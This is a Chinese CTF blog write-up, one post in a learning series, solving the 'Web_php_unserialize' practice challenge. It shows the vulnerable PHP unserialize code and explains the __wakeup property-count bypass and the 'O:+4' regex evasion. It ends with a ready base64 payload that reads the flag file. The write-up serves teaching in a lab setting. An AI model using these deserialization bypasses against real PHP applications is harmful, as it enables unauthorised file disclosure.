CTFer成长记录——CTF之Web专题·攻防世界-Web_php_unserialize

合集 - CTF之web专题(37)

1.CTFer成长记录——web专题·本地访问网址2023-06-262.CTFer成长记录——web专题·一句话木马2023-06-273.CTFer成长记录——Web专题·从cookie中获取信息2023-06-274.CTFer成长记录——Web专题·双写绕过2023-06-275.CTFer成长记录——Web专题·robots协议2023-06-286.CTFer成长记录——Web专题·Linux中的.swp文件2023-06-297.CTFer成长记录——Web专题·修改页面元素2023-06-298.CTFer成长记录——Web专题·判断绕过2023-07-099.CTFer成长记录——CTF之Web专题·初识反序列化2023-07-1410.CTFer成长记录——CTF之Web专题·攻防世界-PHP22023-07-2011. CTFer成长记录——CTF之Web专题·bugku-Simple_SSTI_22023-07-2412.CTFer成长记录——CTF之Web专题·bugku-eval2023-07-2413.CTFer成长记录——CTF之Web专题·bugku-变量12023-07-2714.CTFer成长记录——CTF之Web专题·[ACTF2020 新生赛]Include2023-07-2715. CTFer成长记录——CTF之Web专题·bugku—备份是个好习惯2023-07-2816.CTFer成长记录——CTF之Web专题·攻防世界—easyupload2023-07-2917.CTFer成长记录——CTF之Web专题·攻防世界—fileinclude·好多文件呀2023-07-2918.CTFer成长记录——CTF之Web专题·攻防世界—easyphp2023-07-2919. CTFer成长记录——CTF之Web专题·buuctf—secretfile2023-07-2920.CTFer成长记录——CTF之Web专题·19强网杯—随便注2023-07-3021.CTFer成长记录——CTF之Web专题·攻防世界—file_include2023-07-3122.CTFer成长记录——CTF之Web专题·攻防世界—unseping2023-07-3123.CTFer成长记录——CTF之Web专题·攻防世界—NewsCenter2023-07-3124.CTFer成长记录——CTF之Web专题·极客大挑战 2019—http2023-08-0225.CTFer成长记录——CTF之Web专题·极客大挑战—Upload2023-08-0226.CTFer成长记录——CTF之Web专题·极客大挑战—BabySQL2023-08-0327.CTFer成长记录——CTF之Web专题·攻防世界-Web_python_template_injection2023-08-04

28.CTFer成长记录——CTF之Web专题·攻防世界-Web_php_unserialize2023-08-07

29.CTFer成长记录——CTF之Web专题·攻防世界-php_rce2023-08-0730.CTFer成长记录——CTF之Web专题·攻防世界-Web_php_include2023-08-0731. CTFer成长记录——CTF之Web专题·buuctf-easy_tornado2023-08-0832.CTFer成长记录——CTF之Web专题·攻防世界—lottery2023-08-1033. CTFer成长记录——CTF之Web专题·攻防世界—ics-052023-08-1034.CTFer成长记录——CTF之Web专题·buuctf—admin2023-08-1035.CTFer成长记录——CTF之Web专题·buuctf—Cookies2023-08-1836. CTFer成长记录——CTF之Web专题·bugku—never_give_up2023-08-1837.CTFer成长记录——CTF之Web专题·[SWPUCTF 2021 新生赛]jicao2023-09-30

收起

一、题目链接

https://adworld.xctf.org.cn/challenges/list

二、解法步骤

  本题考察的是反序列化，反序列化的题都需要审计php代码，步骤也比较固定。

<?php 

if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

  从下面看起，首先需要用GET方式传入参数var，然后对其进行base64解密，然后进行正则表达式匹配，其匹配规则是出现[o]+数字，或者[c]+数字就会被过滤，最后反序列化。

class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}

  构造参数主要看题目所给的类，首先题目给出，flag藏在fl4g.php里面，我们需要控制Demo类的成员变量$file，使其等于fl4g.php：$a=new Demo('fl4g.php');

  PS:这里实例化对象的时候，由于是有参构造，需要在实例化的时候对成员变量进行赋值。

  那么如果没有过滤，接下来就是序列化传参了，这里涉及到三个过滤：

第一个__wakeup()函数的过滤：wakeup()函数:发生在反序列化时，如果存在该函数，自动调用该函数。其漏洞是，如果序列化后的字符串中，表示属性个数的数字与真实属性个数一致，那么就会调用，否则不调用。首先看下，序列化后的属性个数："O:4:"Demo":1:{s:10:" Demo file";s:8:"fl4g.php";}，其中表示属性的数字就是 "Demo":1,的这个1，意思是有一个成员变量。

绕过方式：$a=str_replace(':1:',':2:',$a)，即将属性个数改成2个。

第二个正则表达式过滤：绕过o:数字：$a=str_replace('O:4','O:+4',$a)

第三个Base64加密：$a=base64_encode($a)

  payload:TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

三、总结

  本题考察的是反序列的知识点，需要知道对象被序列化后的形式，然后需要知道__wakeup()函数的调用时机及其绕过方式，对于序列化的正则表达式的绕过方式可以积累下来。